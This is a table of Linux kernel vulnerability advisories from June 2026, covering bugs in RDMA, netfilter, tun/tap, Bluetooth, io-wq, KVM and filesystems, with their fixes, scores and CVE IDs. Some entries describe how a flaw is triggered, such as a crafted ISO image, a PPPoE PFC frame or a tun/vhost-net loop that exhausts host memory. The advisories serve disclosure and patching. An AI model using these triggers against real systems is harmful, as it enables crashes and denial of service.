| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: RDMA/rxe: Fix iova-to-va conversion for MR page sizes != PAGE_SIZE The current implementation incorrectly handles memory regions (MRs) with page sizes different from the system PAGE_SIZE. The core issue is that rxe_set_page() is called with mr->page_size step increments, but the page_list stores individual struct page pointers, each representing PAGE_SIZE of memory. ib_sg_to_page() has ensured that when i>=1 either a) SG[i-1].dma_end and SG[i].dma_addr are contiguous or b) SG[i-1].dma_end and SG[i].dma_addr are mr->page_size aligned. This leads to incorrect iova-to-va conversion in scenarios: 1) page_size < PAGE_SIZE (e.g., MR: 4K, system: 64K): ibmr->iova = 0x181800 sg[0]: dma_addr=0x181800, len=0x800 sg[1]: dma_addr=0x173000, len=0x1000 Access iova = 0x181800 + 0x810 = 0x182010 Expected VA: 0x173010 (second SG, offset 0x10) Before fix: - index = (0x182010 >> 12) - (0x181800 >> 12) = 1 - page_offset = 0x182010 & 0xFFF = 0x10 - xarray[1] stores system page base 0x170000 - Resulting VA: 0x170000 + 0x10 = 0x170010 (wrong) 2) page_size > PAGE_SIZE (e.g., MR: 64K, system: 4K): ibmr->iova = 0x18f800 sg[0]: dma_addr=0x18f800, len=0x800 sg[1]: dma_addr=0x170000, len=0x1000 Access iova = 0x18f800 + 0x810 = 0x190010 Expected VA: 0x170010 (second SG, offset 0x10) Before fix: - index = (0x190010 >> 16) - (0x18f800 >> 16) = 1 - page_offset = 0x190010 & 0xFFFF = 0x10 - xarray[1] stores system page for dma_addr 0x170000 - Resulting VA: system page of 0x170000 + 0x10 = 0x170010 (wrong) Yi Zhang reported a kernel panic[1] years ago related to this defect. Solution: 1. Replace xarray with pre-allocated rxe_mr_page array for sequential indexing (all MR page indices are contiguous) 2. Each rxe_mr_page stores both struct page* and offset within the system page 3. Handle MR page_size != PAGE_SIZE relationships: - page_size > PAGE_SIZE: Split MR pages into multiple system pages - page_size <= PAGE_SIZE: Store offset within system page 4. Add boundary checks and compatibility validation This ensures correct iova-to-va conversion regardless of MR page size and system PAGE_SIZE relationship, while improving performance through array-based sequential access. Tests on 4K and 64K PAGE_SIZE hosts: - rdma-core/pytests $ ./build/bin/run_tests.py --dev eth0_rxe - blktest: $ TIMEOUT=30 QUICK_RUN=1 USE_RXE=1 NVMET_TRTYPES=rdma ./check nvme srp rnbd [1] https://lore.kernel.org/all/CAHj4cs9XRqE25jyVw9rj9YugffLn5+f=1znaBEnu1usLOciD+g@mail.gmail.com/T/ | 2026-06-09 | 9.8 | CVE-2026-46325 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: of: unittest: fix use-after-free in of_unittest_changeset() The variable 'parent' is assigned the value of 'nchangeset' earlier in the function, meaning both point to the same struct device_node. The call to of_node_put(nchangeset) can decrement the reference count to zero and free the node if there are no other holders. After that, the code still uses 'parent' to check for the presence of a property and to read a string property, leading to a use-after-free. Fix this by moving the of_node_put() call after the last access to 'parent', avoiding the UAF. | 2026-06-08 | 8.4 | CVE-2026-46288 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: isofs: validate Rock Ridge CE continuation extent against volume size rock_continue() reads rs->cont_extent verbatim from the Rock Ridge CE record and passes it to sb_bread() without checking that the block number is within the mounted ISO 9660 volume. commit e595447e177b ("[PATCH] rock.c: handle corrupted directories") added cont_offset and cont_size rejection for the CE continuation but did not validate the extent block number itself. commit f54e18f1b831 ("isofs: Fix infinite looping over CE entries") later capped the CE chain length at RR_MAX_CE_ENTRIES = 32 but again left the block number unchecked. With a crafted ISO mounted via udisks2 (desktop optical auto-mount) or via CAP_SYS_ADMIN mount, rs->cont_extent can therefore point at an out-of-range block or at blocks belonging to an adjacent filesystem on the same block device. sb_bread() on an out-of-range block returns NULL cleanly via the block layer EIO path, so there is no memory-safety violation. For in-range reads of adjacent- filesystem data, the CE buffer is parsed as Rock Ridge records and only the text of SL sub-records reaches userspace through readlink(), which makes the info-leak channel narrow and difficult to exploit; still, rejecting the malformed CE outright matches the rejection shape already present in the same function for cont_offset and cont_size. Add an ISOFS_SB(sb)->s_nzones bounds check to rock_continue() next to the existing offset/size rejection, printing the same corrupted-directory-entry notice. | 2026-06-08 | 8.2 | CVE-2026-46303 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: wifi: ath5k: do not access array OOB Vincent reports: > The ath5k driver seems to do an array-index-out-of-bounds access as > shown by the UBSAN kernel message: > UBSAN: array-index-out-of-bounds in drivers/net/wireless/ath/ath5k/base.c:1741:20 > index 4 is out of range for type 'ieee80211_tx_rate [4]' > ... > Call Trace: > <TASK> > dump_stack_lvl+0x5d/0x80 > ubsan_epilogue+0x5/0x2b > __ubsan_handle_out_of_bounds.cold+0x46/0x4b > ath5k_tasklet_tx+0x4e0/0x560 [ath5k] > tasklet_action_common+0xb5/0x1c0 It is real. 'ts->ts_final_idx' can be 3 on 5212, so: info->status.rates[ts->ts_final_idx + 1].idx = -1; with the array defined as: struct ieee80211_tx_rate rates[IEEE80211_TX_MAX_RATES]; while the size is: #define IEEE80211_TX_MAX_RATES 4 is indeed bogus. Set this 'idx = -1' sentinel only if the array index is less than the array size, as mac80211 will not look at rates beyond the size (IEEE80211_TX_MAX_RATES). Note: The effect of the OOB write is negligible. It just overwrites the next member of info->status, i.e. ack_signal. | 2026-06-08 | 8.3 | CVE-2026-46307 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: KVM: arm64: Reassign nested_mmus array behind mmu_lock kvm->arch.nested_mmus[] is walked under kvm->mmu_lock, including from the MMU notifier path (kvm_unmap_gfn_range() -> kvm_nested_s2_unmap()), which can run at any time. kvm_vcpu_init_nested() reallocates the array and frees the old buffer while holding only kvm->arch.config_lock, so such a walker can reference the freed array. Allocate the new array outside of mmu_lock, as the allocation can sleep. Under the lock, copy the existing entries, fix up the back pointers and reassign the array. Free the old buffer after dropping the lock, as kvfree() can sleep as well. | 2026-06-09 | 8.8 | CVE-2026-46317 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: iio: pressure: mprls0025pa: fix spi_transfer struct initialisation Make sure that the spi_transfer struct is zeroed out before use. | 2026-06-09 | 8.4 | CVE-2026-46326 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: greybus: gb-beagleplay: bound bootloader receive buffering cc1352_bootloader_rx() appends each serdev chunk into the fixed rx_buffer before parsing bootloader packets. The helper can keep leftover bytes between callbacks and may receive multiple packets in one callback, so a single count value is not constrained by one packet length. Check that the incoming chunk fits in the remaining receive buffer space before memcpy(). If it does not, drop the staged data and consume the bytes instead of overflowing rx_buffer. | 2026-06-09 | 8 | CVE-2026-46332 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: io-wq: check that the predecessor is hashed in io_wq_remove_pending() io_wq_remove_pending() needs to fix up wq->hash_tail[] if the cancelled work was the tail of its hash bucket. When doing this, it checks whether the preceding entry in acct->work_list has the same hash value, but never checks that the predecessor is hashed at all. io_get_work_hash() is simply atomic_read(&work->flags) >> IO_WQ_HASH_SHIFT, and the hash bits are never set for non-hashed work, so it returns 0. Thus, when a hashed bucket-0 work is cancelled while a non-hashed work is its list predecessor, the check spuriously passes and a pointer to the non-hashed io_kiocb is stored in wq->hash_tail[0]. Because non-hashed work is dequeued via the fast path in io_get_next_work(), which never touches hash_tail[], the stale pointer is never cleared. Therefore, after the non-hashed io_kiocb completes and is freed back to req_cachep, wq->hash_tail[0] is a dangling pointer. The io_wq is per-task (tctx->io_wq) and survives ring open/close, so the dangling pointer persists for the lifetime of the task; the next hashed bucket-0 enqueue dereferences it in io_wq_insert_work() and wq_list_add_after() writes through freed memory. Add the missing io_wq_is_hashed() check so a non-hashed predecessor never inherits a hash_tail[] slot. | 2026-06-08 | 7.8 | CVE-2026-46274 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Bluetooth: hci_uart: fix UAFs and race conditions in close and init paths Vulnerabilities leading to Use-After-Free (UAF) and Null Pointer Dereference (NPD) conditions were observed in the lifecycle management of hci_uart. The primary issue arises because the workqueues (init_ready and write_work) are only flushed/cancelled if the HCI_UART_PROTO_READY flag is set during TTY close. If a hangup occurs before setup completes, hci_uart_tty_close() skips the teardown of these workqueues and proceeds to free the `hu` struct. When the scheduled work executes later, it blindly dereferences the freed `hu` struct. Furthermore, several data races and UAFs were identified in the teardown sequence: 1. Calling hci_uart_flush() from hci_uart_close() without effectively disabling write_work causes a race condition where both can concurrently double-free hu->tx_skb. This happens because protocol timers can concurrently invoke hci_uart_tx_wakeup() and requeue write_work. 2. Calling hci_free_dev(hdev) before hu->proto->close(hu) causes a UAF when vendor specific protocol close callbacks dereference hu->hdev. 3. In the initialization error paths, failing to take the proto_lock write lock before clearing PROTO_READY leads to races with active readers. Additionally, hci_uart_tty_receive() accesses hu->hdev outside the read lock, leading to UAFs if the initialization error path frees hdev concurrently. Fix these synchronization and lifecycle issues by: 1. Re-ordering hci_uart_tty_close() to clear HCI_UART_PROTO_READY first, followed immediately by a cancel_work_sync(&hu->write_work). Clearing the flag locks out concurrent protocol timers from successfully invoking hci_uart_tx_wakeup(), effectively rendering the cancellation permanent and preventing the tx_skb double-free. 2. Note: Clearing PROTO_READY early causes hci_uart_close() to skip hu->proto->flush(). This is perfectly safe in the tty_close path because hu->proto->close() executes shortly after, which intrinsically purges all protocol SKB queues and tears down the state. 3. Relocating hu->proto->close(hu) strictly prior to hci_free_dev(hdev) across all close and error paths to prevent vendor-level UAFs. 4. Moving the hdev->stat.byte_rx increment in hci_uart_tty_receive() inside the proto_lock read-side critical section to safely synchronize with device unregistration. 5. Adding cancel_work_sync(&hu->write_work) to hci_uart_close() to safely flush the workqueue before hci_uart_flush() is invoked via the HCI core. 6. Utilizing cancel_work_sync() instead of disable_work_sync() across all paths to prevent permanently breaking user-space retry capabilities. | 2026-06-08 | 7.8 | CVE-2026-46275 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: mm/zone_device: do not touch device folio after calling ->folio_free() The contents of a device folio can immediately change after calling ->folio_free(), as the folio may be reallocated by a driver with a different order. Instead of touching the folio again to extract the pgmap, use the local stack variable when calling percpu_ref_put_many(). | 2026-06-08 | 7.8 | CVE-2026-46277 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: lib: test_hmm: evict device pages on file close to avoid use-after-free Patch series "Minor hmm_test fixes and cleanups". Two bugfixes and a cleanup for the HMM kernel selftests. These were mostly reported by Zenghui Yu with special thanks to Lorenzo for analysing and pointing out the problems. This patch (of 3): When dmirror_fops_release() is called it frees the dmirror struct but doesn't migrate device private pages back to system memory first. This leaves those pages with a dangling zone_device_data pointer to the freed dmirror. If a subsequent fault occurs on those pages (e.g. during coredump) the dmirror_devmem_fault() callback dereferences the stale pointer causing a kernel panic. This was reported [1] when running mm/ksft_hmm.sh on arm64, where a test failure triggered SIGABRT and the resulting coredump walked the VMAs faulting in the stale device private pages. Fix this by calling dmirror_device_evict_chunk() for each devmem chunk in dmirror_fops_release() to migrate all device private pages back to system memory before freeing the dmirror struct. The function is moved earlier in the file to avoid a forward declaration. | 2026-06-08 | 7.8 | CVE-2026-46280 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: hfsplus: fix held lock freed on hfsplus_fill_super() hfsplus_fill_super() calls hfs_find_init() to initialize a search structure, which acquires tree->tree_lock. If the subsequent call to hfsplus_cat_build_key() fails, the function jumps to the out_put_root error label without releasing the lock. The later cleanup path then frees the tree data structure with the lock still held, triggering a held lock freed warning. Fix this by adding the missing hfs_find_exit(&fd) call before jumping to the out_put_root error label. This ensures that tree->tree_lock is properly released on the error path. The bug was originally detected on v6.13-rc1 using an experimental static analysis tool we are developing, and we have verified that the issue persists in the latest mainline kernel. The tool is specifically designed to detect memory management issues. It is currently under active development and not yet publicly available. We confirmed the bug by runtime testing under QEMU with x86_64 defconfig, lockdep enabled, and CONFIG_HFSPLUS_FS=y. To trigger the error path, we used GDB to dynamically shrink the max_unistr_len parameter to 1 before hfsplus_asc2uni() is called. This forces hfsplus_asc2uni() to naturally return -ENAMETOOLONG, which propagates to hfsplus_cat_build_key() and exercises the faulty error path. The following warning was observed during mount: ========================= WARNING: held lock freed! 7.0.0-rc3-00016-gb4f0dd314b39 #4 Not tainted ------------------------- mount/174 is freeing memory ffff888103f92000-ffff888103f92fff, with a lock still held there! ffff888103f920b0 (&tree->tree_lock){+.+.}-{4:4}, at: hfsplus_find_init+0x154/0x1e0 2 locks held by mount/174: #0: ffff888103f960e0 (&type->s_umount_key#42/1){+.+.}-{4:4}, at: alloc_super.constprop.0+0x167/0xa40 #1: ffff888103f920b0 (&tree->tree_lock){+.+.}-{4:4}, at: hfsplus_find_init+0x154/0x1e0 stack backtrace: CPU: 2 UID: 0 PID: 174 Comm: mount Not tainted 7.0.0-rc3-00016-gb4f0dd314b39 #4 PREEMPT(lazy) Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.15.0-1 04/01/2014 Call Trace: <TASK> dump_stack_lvl+0x82/0xd0 debug_check_no_locks_freed+0x13a/0x180 kfree+0x16b/0x510 ? hfsplus_fill_super+0xcb4/0x18a0 hfsplus_fill_super+0xcb4/0x18a0 ? __pfx_hfsplus_fill_super+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? bdev_open+0x65f/0xc30 ? srso_return_thunk+0x5/0x5f ? pointer+0x4ce/0xbf0 ? trace_contention_end+0x11c/0x150 ? __pfx_pointer+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? bdev_open+0x79b/0xc30 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? vsnprintf+0x6da/0x1270 ? srso_return_thunk+0x5/0x5f ? __mutex_unlock_slowpath+0x157/0x740 ? __pfx_vsnprintf+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? mark_held_locks+0x49/0x80 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? irqentry_exit+0x17b/0x5e0 ? trace_irq_disable.constprop.0+0x116/0x150 ? __pfx_hfsplus_fill_super+0x10/0x10 ? __pfx_hfsplus_fill_super+0x10/0x10 get_tree_bdev_flags+0x302/0x580 ? __pfx_get_tree_bdev_flags+0x10/0x10 ? vfs_parse_fs_qstr+0x129/0x1a0 ? __pfx_vfs_parse_fs_qstr+0x3/0x10 vfs_get_tree+0x89/0x320 fc_mount+0x10/0x1d0 path_mount+0x5c5/0x21c0 ? __pfx_path_mount+0x10/0x10 ? trace_irq_enable.constprop.0+0x116/0x150 ? trace_irq_enable.constprop.0+0x116/0x150 ? srso_return_thunk+0x5/0x5f ? srso_return_thunk+0x5/0x5f ? kmem_cache_free+0x307/0x540 ? user_path_at+0x51/0x60 ? __x64_sys_mount+0x212/0x280 ? srso_return_thunk+0x5/0x5f __x64_sys_mount+0x212/0x280 ? __pfx___x64_sys_mount+0x10/0x10 ? srso_return_thunk+0x5/0x5f ? trace_irq_enable.constprop.0+0x116/0x150 ? srso_return_thunk+0x5/0x5f do_syscall_64+0x111/0x680 entry_SYSCALL_64_after_hwframe+0x77/0x7f RIP: 0033:0x7ffacad55eae Code: 48 8b 0d 85 1f 0f 00 f7 d8 64 89 01 48 83 c8 ff c3 66 2e 0f 1f 84 00 00 00 00 00 90 f3 0f 1e fa 49 89 ca b8 a5 00 00 8 RSP: 002b ---truncated--- | 2026-06-08 | 7 | CVE-2026-46299 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: nvmet: avoid recursive nvmet-wq flush in nvmet_ctrl_free nvmet_tcp_release_queue_work() runs on nvmet-wq and can drop the final controller reference through nvmet_cq_put(). If that triggers nvmet_ctrl_free(), the teardown path flushes ctrl->async_event_work on the same nvmet-wq. Call chain: nvmet_tcp_schedule_release_queue() kref_put(&queue->kref, nvmet_tcp_release_queue) nvmet_tcp_release_queue() queue_work(nvmet_wq, &queue->release_work) <--- nvmet_wq process_one_work() nvmet_tcp_release_queue_work() nvmet_cq_put(&queue->nvme_cq) nvmet_cq_destroy() nvmet_ctrl_put(cq->ctrl) nvmet_ctrl_free() flush_work(&ctrl->async_event_work) <--- nvmet_wq Previously Scheduled by :- nvmet_add_async_event queue_work(nvmet_wq, &ctrl->async_event_work); This trips lockdep with a possible recursive locking warning. [ 5223.015876] run blktests nvme/003 at 2026-04-07 20:53:55 [ 5223.061801] loop0: detected capacity change from 0 to 2097152 [ 5223.072206] nvmet: adding nsid 1 to subsystem blktests-subsystem-1 [ 5223.088368] nvmet_tcp: enabling port 0 (127.0.0.1:4420) [ 5223.126086] nvmet: Created discovery controller 1 for subsystem nqn.2014-08.org.nvmexpress.discovery for NQN nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349. [ 5223.128453] nvme nvme1: new ctrl: NQN "nqn.2014-08.org.nvmexpress.discovery", addr 127.0.0.1:4420, hostnqn: nqn.2014-08.org.nvmexpress:uuid:0f01fb42-9f7f-4856-b0b3-51e60b8de349 [ 5233.199447] nvme nvme1: Removing ctrl: NQN "nqn.2014-08.org.nvmexpress.discovery" [ 5233.227718] ============================================ [ 5233.231283] WARNING: possible recursive locking detected [ 5233.234696] 7.0.0-rc3nvme+ #20 Tainted: G O N [ 5233.238434] -------------------------------------------- [ 5233.241852] kworker/u192:6/2413 is trying to acquire lock: [ 5233.245429] ffff888111632548 ((wq_completion)nvmet-wq){+.+.}-{0:0}, at: touch_wq_lockdep_map+0x26/0x90 [ 5233.251438] but task is already holding lock: [ 5233.255254] ffff888111632548 ((wq_completion)nvmet-wq){+.+.}-{0:0}, at: process_one_work+0x5cc/0x6e0 [ 5233.261125] other info that might help us debug this: [ 5233.265333] Possible unsafe locking scenario: [ 5233.269217] CPU0 [ 5233.270795] ---- [ 5233.272436] lock((wq_completion)nvmet-wq); [ 5233.275241] lock((wq_completion)nvmet-wq); [ 5233.278020] *** DEADLOCK *** [ 5233.281793] May be due to missing lock nesting notation [ 5233.286195] 3 locks held by kworker/u192:6/2413: [ 5233.289192] #0: ffff888111632548 ((wq_completion)nvmet-wq){+.+.}-{0:0}, at: process_one_work+0x5cc/0x6e0 [ 5233.294569] #1: ffffc9000e2a7e40 ((work_completion)(&queue->release_work)){+.+.}-{0:0}, at: process_one_work+0x1c5/0x6e0 [ 5233.300128] #2: ffffffff82d7dc40 (rcu_read_lock){....}-{1:3}, at: __flush_work+0x62/0x530 [ 5233.304290] stack backtrace: [ 5233.306520] CPU: 4 UID: 0 PID: 2413 Comm: kworker/u192:6 Tainted: G O N 7.0.0-rc3nvme+ #20 PREEMPT(full) [ 5233.306524] Tainted: [O]=OOT_MODULE, [N]=TEST [ 5233.306525] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS rel-1.17.0-0-gb52ca86e094d-prebuilt.qemu.org 04/01/2014 [ 5233.306527] Workqueue: nvmet-wq nvmet_tcp_release_queue_work [nvmet_tcp] [ 5233.306532] Call Trace: [ 5233.306534] <TASK> [ 5233.306536] dump_stack_lvl+0x73/0xb0 [ 5233.306552] print_deadlock_bug+0x225/0x2f0 [ 5233.306556] __lock_acquire+0x13f0/0x2290 [ 5233.306563] lock_acquire+0xd0/0x300 [ 5233.306565] ? touch_wq_lockdep_map+0x26/0x90 [ 5233.306571] ? __flush_work+0x20b/0x530 [ 5233.306573] ? touch_wq_lockdep_map+0x26/0x90 [ 5233.306577] touch_wq_lockdep_map+0x3b/0x90 [ 5233.306580] ? touch_wq_lockdep_map+0x26/0x90 [ 52 ---truncated--- | 2026-06-08 | 7.5 | CVE-2026-46304 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: flow_dissector: do not dissect PPPoE PFC frames RFC 2516 Section 7 states that Protocol Field Compression (PFC) is NOT RECOMMENDED for PPPoE. In practice, pppd does not support negotiating PFC for PPPoE sessions, and the flow dissector driver has assumed an uncompressed frame until the blamed commit. During the review process of that commit [1], support for PFC is suggested. However, having a compressed (1-byte) protocol field means the subsequent PPP payload is shifted by one byte, causing 4-byte misalignment for the network header and an unaligned access exception on some architectures. The exception can be reproduced by sending a PPPoE PFC frame to an ethernet interface of a MIPS board, with RPS enabled, even if no PPPoE session is active on that interface: $ 0 : 00000000 80c40000 00000000 85144817 $ 4 : 00000008 00000100 80a75758 81dc9bb8 $ 8 : 00000010 8087ae2c 0000003d 00000000 $12 : 000000e0 00000039 00000000 00000000 $16 : 85043240 80a75758 81dc9bb8 00006488 $20 : 0000002f 00000007 85144810 80a70000 $24 : 81d1bda0 00000000 $28 : 81dc8000 81dc9aa8 00000000 805ead08 Hi : 00009d51 Lo : 2163358a epc : 805e91f0 __skb_flow_dissect+0x1b0/0x1b50 ra : 805ead08 __skb_get_hash_net+0x74/0x12c Status: 11000403 KERNEL EXL IE Cause : 40800010 (ExcCode 04) BadVA : 85144817 PrId : 0001992f (MIPS 1004Kc) Call Trace: [<805e91f0>] __skb_flow_dissect+0x1b0/0x1b50 [<805ead08>] __skb_get_hash_net+0x74/0x12c [<805ef330>] get_rps_cpu+0x1b8/0x3fc [<805fca70>] netif_receive_skb_list_internal+0x324/0x364 [<805fd120>] napi_complete_done+0x68/0x2a4 [<8058de5c>] mtk_napi_rx+0x228/0xfec [<805fd398>] __napi_poll+0x3c/0x1c4 [<805fd754>] napi_threaded_poll_loop+0x234/0x29c [<805fd848>] napi_threaded_poll+0x8c/0xb0 [<80053544>] kthread+0x104/0x12c [<80002bd8>] ret_from_kernel_thread+0x14/0x1c Code: 02d51821 1060045b 00000000 <8c640000> 3084000f 2c820005 144001a2 00042080 8e220000 To reduce the attack surface and maintain performance, do not process PPPoE PFC frames. [1] https://lore.kernel.org/r/20220630231016.GA392@debian.home | 2026-06-08 | 7.5 | CVE-2026-46306 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu/userq: fix access to stale wptr mapping Use drm_exec to take both locks, i.e. the vm root bo and the wptr_obj bo, to access the mapping data properly. This fixes the security issue of unmapping the wptr_obj while a queue creation is in progress and passing another bo at the same address. (cherry picked from commit 1fc6c8ab45dbee096469c08c13f6099d57a52d6c) | 2026-06-08 | 7.8 | CVE-2026-46311 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net/sched: act_ct: Only release RCU read lock after ct_ft When looking up a flow table in act_ct in tcf_ct_flow_table_get(), rhashtable_lookup_fast() internally opens and closes an RCU read critical section before returning ct_ft. The tcf_ct_flow_table_cleanup_work() can complete before refcount_inc_not_zero() is invoked on the returned ct_ft resulting in a UAF on the already freed ct_ft object. This vulnerability can lead to privilege escalation. Analysis from zdi-disclosures@trendmicro.com: When initializing act_ct, tcf_ct_init() is called, which internally triggers tcf_ct_flow_table_get(). static int tcf_ct_flow_table_get(struct net *net, struct tcf_ct_params *params) { struct zones_ht_key key = { .net = net, .zone = params->zone }; struct tcf_ct_flow_table *ct_ft; int err = -ENOMEM; mutex_lock(&zones_mutex); ct_ft = rhashtable_lookup_fast(&zones_ht, &key, zones_params); // [1] if (ct_ft && refcount_inc_not_zero(&ct_ft->ref)) // [2] goto out_unlock; ... } static __always_inline void *rhashtable_lookup_fast( struct rhashtable *ht, const void *key, const struct rhashtable_params params) { void *obj; rcu_read_lock(); obj = rhashtable_lookup(ht, key, params); rcu_read_unlock(); return obj; } At [1], rhashtable_lookup_fast() looks up and returns the corresponding ct_ft from zones_ht. The lookup is performed within an RCU read critical section through rcu_read_lock() / rcu_read_unlock(), which prevents the object from being freed. However, at the point of function return, rcu_read_unlock() has already been called, and there is nothing preventing ct_ft from being freed before reaching refcount_inc_not_zero(&ct_ft->ref) at [2]. This interval becomes the race window, during which ct_ft can be freed. Free Process: tcf_ct_flow_table_put() is executed through the path tcf_ct_cleanup() call_rcu() tcf_ct_params_free_rcu() tcf_ct_params_free() tcf_ct_flow_table_put(). static void tcf_ct_flow_table_put(struct tcf_ct_flow_table *ct_ft) { if (refcount_dec_and_test(&ct_ft->ref)) { rhashtable_remove_fast(&zones_ht, &ct_ft->node, zones_params); INIT_RCU_WORK(&ct_ft->rwork, tcf_ct_flow_table_cleanup_work); // [3] queue_rcu_work(act_ct_wq, &ct_ft->rwork); } } At [3], tcf_ct_flow_table_cleanup_work() is scheduled as RCU work static void tcf_ct_flow_table_cleanup_work(struct work_struct *work) { struct tcf_ct_flow_table *ct_ft; struct flow_block *block; ct_ft = container_of(to_rcu_work(work), struct tcf_ct_flow_table, rwork); nf_flow_table_free(&ct_ft->nf_ft); block = &ct_ft->nf_ft.flow_block; down_write(&ct_ft->nf_ft.flow_block_lock); WARN_ON(!list_empty(&block->cb_list)); up_write(&ct_ft->nf_ft.flow_block_lock); kfree(ct_ft); // [4] module_put(THIS_MODULE); } tcf_ct_flow_table_cleanup_work() frees ct_ft at [4]. When this function executes between [1] and [2], UAF occurs. This race condition has a very short race window, making it generally difficult to trigger. Therefore, to trigger the vulnerability an msleep(100) was inserted after [1] | 2026-06-09 | 7.8 | CVE-2026-46319 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tap: free page on error paths in tap_get_user_xdp() tap_get_user_xdp() rejects a frame shorter than ETH_HLEN with -EINVAL, and returns -ENOMEM when build_skb() fails. Both paths jump to the err label without freeing the page that vhost_net_build_xdp() allocated for the frame. tap_sendmsg() discards the per-buffer return value and always returns 0, so vhost_tx_batch() takes the success path and never frees the page; each rejected frame in a batch leaks one page-frag chunk. Free the page on both error paths, before the skb is built. This is the tap counterpart of the same leak in tun_xdp_one(). | 2026-06-09 | 7.4 | CVE-2026-46320 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tun: free page on short-frame rejection in tun_xdp_one() tun_xdp_one() returns -EINVAL on a frame shorter than ETH_HLEN without freeing the page that vhost_net_build_xdp() allocated for it. tun_sendmsg() discards that -EINVAL and still returns total_len, so vhost_tx_batch() takes the success path and never frees the page; each short frame in a batch leaks one page-frag chunk. A local process that can open /dev/net/tun and /dev/vhost-net can hit this path: it attaches a tun/tap device as the vhost-net backend and feeds TX descriptors whose length minus the virtio-net header is below ETH_HLEN. Each kick leaks the page-frag chunks for that batch, and a tight submission loop exhausts host memory and triggers an OOM panic. Free the page before returning -EINVAL, matching the XDP-program error path in the same function. | 2026-06-09 | 7.1 | CVE-2026-46321 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: tun: free page on build_skb failure in tun_xdp_one() When build_skb() fails in tun_xdp_one(), the function sets ret to -ENOMEM and jumps to the out label, which returns without freeing the page that vhost_net_build_xdp() allocated for the frame. As with the short-frame rejection path, tun_sendmsg() discards the per-buffer error and still returns total_len, so vhost_tx_batch() takes the success path and never frees the page. Each build_skb() failure in a batch leaks one page-frag chunk. Free the page before taking the error path, matching the put_page() the other error exits of tun_xdp_one() already perform. | 2026-06-09 | 7.1 | CVE-2026-46322 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: net: gro: don't merge zcopy skbs skb_gro_receive() can currently copy frags between the source and GRO skb, without checking the zerocopy status, and in particular the SKBFL_MANAGED_FRAG_REFS flag. When SKBFL_MANAGED_FRAG_REFS is set, the skb doesn't hold a reference on the pages in shinfo->frags. Appending those frags to another skb's frags without fixing up the page refcount can lead to UAF. When either the last skb in the GRO chain (the one we would append frags to) or the source skb is zerocopy, don't merge the skbs. | 2026-06-09 | 7.8 | CVE-2026-46323 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: use list_del_rcu for netlink hooks nft_netdev_unregister_hooks and __nft_unregister_flowtable_net_hooks need to use list_del_rcu(), this list can be walked by concurrent dumpers. Add a new helper and use it consistently. | 2026-06-09 | 7.8 | CVE-2026-46324 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: dm: fix unlocked test for dm_suspended_md The function dm_blk_report_zones tests if the device is suspended with the "dm_suspended_md" call. However, this function is called without holding any locks, so the device may be suspended just after it. Move the call to dm_suspended_md after dm_get_live_table, so that the device can't be suspended after the suspended state was tested. | 2026-06-09 | 7.8 | CVE-2026-46327 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: apparmor: fix rlimit for posix cpu timers Posix cpu timers require an additional step beyond setting the rlimit. Refactor the code so it's clear which code is setting the limit, and conditionally update the posix cpu timers when appropriate. | 2026-06-09 | 7.3 | CVE-2026-46328 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: Revert "net/smc: Introduce TCP ULP support" This reverts commit d7cd421da9da2cc7b4d25b8537f66db5c8331c40. As reported by Al Viro, the TCP ULP support for SMC is fundamentally broken. The implementation attempts to convert an active TCP socket into an SMC socket by modifying the underlying `struct file`, dentry, and inode in-place, which violates core VFS invariants that assume these structures are immutable for an open file, creating a risk of use after free errors and general system instability. Given the severity of this design flaw and the fact that cleaner alternatives (e.g., LD_PRELOAD, BPF) exist for legacy application transparency, the correct course of action is to remove this feature entirely. | 2026-06-09 | 7.8 | CVE-2026-46330 |
| Linux--Linux | In the Linux kernel, the following vulnerability has been resolved: 9p: fix access mode flags being ORed instead of replaced Since commit 1f3e4142c0eb ("9p: convert to the new mount API"), v9fs_apply_options() applies parsed mount flags with |= onto flags already set by v9fs_session_init(). For 9P2000.L, session_init sets V9FS_ACCESS_CLIENT as the default, so when the user mounts with "access=user", both bits end up set. Access mode checks compare against exact values, so having both bits set matches neither mode. This causes v9fs_fid_lookup() to fall through to the default switch case, using INVALID_UID (nobody/65534) instead of current_fsuid() for all fid lookups. Root is then unable to chown or perform other privileged operations. Fix by clearing the access mask before applying the user's choice. | 2026-06-09 | 7.7 | CVE-2026-52906 |
